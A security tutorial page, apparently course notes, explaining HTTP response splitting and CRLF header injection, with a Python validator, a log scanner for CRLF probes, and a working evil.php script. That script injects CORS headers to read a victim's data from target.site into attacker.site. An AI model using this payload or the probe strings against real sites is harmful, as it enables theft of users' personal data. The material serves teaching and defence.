# HTTP Response Splitting

The HTTP standard uses `\r\n` (CRLF) as part of its syntax to mark the end of each header line and, with an empty line, the end of the header block. Because of this, an attacker who can get a CRLF sequence into a response header may be able to terminate the header block prematurely and have a single response interpreted as two responses, effectively creating two **response blocks**. This behaviour can be abused.

{% hint style="info" %}
This is different from [<mark style="color:purple;">**Header Injection**</mark>](#sop-bypass-header-injection) attacks where we are instead adding new headers to a single response block.
{% endhint %}

### Things to look for:

* Application puts user input into a response header
* Set-Cookie is a good header to test
* Sites that reflect the referring domain to track your last visited site
* There may be sanitization in place that filters CR/LF
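The splitting mechanism described above, together with the header-value check a defender wants in place, as an added Python example that is not from the original page. The endpoint and parameter names follow the page's scenario (getPersonalData.php, trackingUrl); build_response, safe_header_value, count_response_blocks and split_headers_and_body are assumed helper names, and the SPLIT_VALUE input is constructed.

```python
"""Added example (not from the original page): shows how CR/LF inside a
reflected header value splits one HTTP response into two, and a header-value
check that refuses such input. Helper names are assumptions.
"""
from urllib.parse import unquote

CRLF = "\r\n"

# Constructed input: what the server sees after its framework has URL-decoded
# ?trackingUrl=test%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0a<html>injected</html>
SPLIT_VALUE = unquote(
    "test%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0a%3Chtml%3Einjected%3C/html%3E"
)


class InvalidHeaderValue(ValueError):
    """Raised when user input would break out of a single header line."""


def safe_header_value(value: str) -> str:
    """Return value unchanged if it may be placed in a header field, else raise.

    Rejects CR, LF and every other ASCII control character except horizontal
    tab (RFC 7230 allows none of the others in a field value). The check runs
    on the decoded value because the framework has already turned %0d%0a into
    real bytes by the time application code sees it.
    """
    for ch in value:
        code = ord(ch)
        if (code < 0x20 and ch != "\t") or code == 0x7F:
            raise InvalidHeaderValue(f"control character {code:#04x} in header value")
    return value


def build_response(tracking_url: str, validate: bool = False) -> str:
    """Build the raw response of getPersonalData.php.

    validate=False reflects the input straight into Set-Cookie (the vulnerable
    pattern the page describes); validate=True runs it through
    safe_header_value first.
    """
    if validate:
        tracking_url = safe_header_value(tracking_url)
    return (
        "HTTP/1.1 200 OK" + CRLF
        + "Content-Type: text/html" + CRLF
        + "Set-Cookie: trackingUrl=" + tracking_url + CRLF
        + CRLF
        + "<html>real page</html>"
    )


def count_response_blocks(raw: str) -> int:
    """Count the responses a client would parse from one byte stream.

    Simplified on purpose: every line that starts with a status line 'HTTP/'
    begins a new response block. Real parsers also honour Content-Length, but
    this is enough to make the split visible.
    """
    return sum(1 for line in raw.split(CRLF) if line.startswith("HTTP/"))


def split_headers_and_body(raw: str) -> tuple[list[str], str]:
    """Return (header lines, body) of the FIRST response block in raw."""
    head, _, body = raw.partition(CRLF + CRLF)
    return head.split(CRLF), body


if __name__ == "__main__":
    vulnerable = build_response(SPLIT_VALUE)
    print("blocks:", count_response_blocks(vulnerable))  # 2
    headers, body = split_headers_and_body(vulnerable)
    print("first block headers:", headers)  # Set-Cookie is cut off at 'test'
    print("first block body starts with:", body[:15])  # 'HTTP/1.1 200 OK'
    try:
        build_response(SPLIT_VALUE, validate=True)
    except InvalidHeaderValue as exc:
        print("rejected:", exc)
```

The important design choice is to reject rather than strip: silently removing CR/LF leaves a value that looks sane but differs from what the user sent, and it hides probing from logs. Most modern frameworks (Node's `http`, Django, Go's `net/http`) already refuse control characters in header values, so the check matters most for hand-rolled `header()` calls like the PHP endpoint on this page.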

### Example from eLearn:

![Malicious Link](/files/cpQHKZ6lQEoiXcCvBqkS)

![Split Response](/files/w1g3jLw27kQ4MVdyWQ66)

This split response makes the browser render the second response. That response can contain such things as XSS payloads and apparent defacement.

### SOP Bypass (header injection):

![](/files/3C0LFAycv6PYZxAfUpMJ)

![](/files/yNtcQrkuYKV50PRrKKUl)

Then the attacker would host an evil file at attacker.site/evil.php whose JavaScript makes a cross-domain AJAX request to steal data from the target domain.

{% tabs %}
{% tab title="evil.php" %}

```html
<!-- evil.php is served as HTML: the injected CORS headers make the browser
     permit a credentialed cross-origin read of the target's response. -->
<div id="responseDiv"></div>
<script>
function loadXMLDoc() {
    var xmlhttp = new XMLHttpRequest();
    xmlhttp.withCredentials = true; // send the victim's cookies for target.site
    xmlhttp.onreadystatechange = function () {
        if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
            document.getElementById("responseDiv").innerHTML = xmlhttp.responseText;
        }
    };
    // %0d%0a (CRLF) ends the reflected header; the two CORS headers follow it.
    // The original had ';' instead of ':' after Access-Control-Allow-Origin.
    xmlhttp.open("GET", "http://target.site/getPersonalData.php?trackingUrl=test%0d%0aAccess-Control-Allow-Origin:%20http://attacker.site%0d%0aAccess-Control-Allow-Credentials:%20true", true);
    xmlhttp.send();
}
loadXMLDoc();
</script>
```

{% endtab %}
{% endtabs %}

{% hint style="warning" %}
If the application is not vulnerable to response splitting, the injected CORS headers never reach the browser and the same-origin policy blocks the cross-origin request.
{% endhint %}
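The CRLF probes that both the splitting and the header-injection variants depend on show up in web server access logs. As an added Python example that is not part of the original page, the following scans combined-format log lines for CR/LF in the query string and in the Referer header, the two reflection points listed above, whether the sequence is raw, percent-encoded once or twice, or written as Apache's `\xHH` escape. The log lines are constructed; the getPersonalData.php endpoint and trackingUrl parameter follow the page.

```python
"""Added example (not from the original page): flag access-log requests that
carry CR/LF in a query string or Referer value, i.e. probes for response
splitting or header injection. Log lines are constructed.
"""
import re
from urllib.parse import unquote

# Apache/nginx combined log format (simplified, enough for the fields used here)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Apache writes control characters into the log as \xHH escapes
APACHE_ESC_RE = re.compile(r"\\x0[dDaA]")

# Constructed sample log: one normal request, two CRLF probes against the
# trackingUrl parameter (single- and double-encoded), one CRLF in Referer.
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /getPersonalData.php?trackingUrl=https://example.com/ HTTP/1.1" 200 512 "https://example.com/" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /getPersonalData.php?trackingUrl=test%0d%0aSet-Cookie:%20x=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /getPersonalData.php?trackingUrl=test%250d%250aX-Injected:%201 HTTP/1.1" 200 512 "-" "curl/8.0"',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php HTTP/1.1" 200 100 "https://evil.example\\x0d\\x0aX-Ref: 1" "Mozilla/5.0"',
]


def contains_crlf(field: str) -> bool:
    """True if field holds CR or LF raw, percent-encoded (once or twice), or as \\xHH log escapes."""
    if APACHE_ESC_RE.search(field):
        return True
    decoded = unquote(unquote(field))  # second pass catches %250d%250a
    return "\r" in decoded or "\n" in decoded


def scan_access_log(lines):
    """Return one finding per request field that contains CR/LF.

    A 200 status on a flagged request is the interesting case: frameworks
    that reject control characters in headers usually answer 400 or 500.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the scan
        path, _, query = m.group("target").partition("?")
        for where, field in (("query", query), ("referer", m.group("referer"))):
            if field and contains_crlf(field):
                findings.append({
                    "ip": m.group("ip"),
                    "path": path,
                    "where": where,
                    "status": int(m.group("status")),
                    "decoded": unquote(unquote(field)),
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(LOG_LINES):
        print(f"{f['ip']} {f['status']} {f['path']} [{f['where']}] {f['decoded']!r}")
```

Run it against real logs by replacing LOG_LINES with the file's lines. The double `unquote` is deliberate: a single decode misses `%250d%250a`, which is what a tester sends when the first decoding layer is a proxy or the application decodes twice. Remember that many servers log the request line already decoded or with control characters escaped, so the escape pattern should match whatever your server actually writes.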
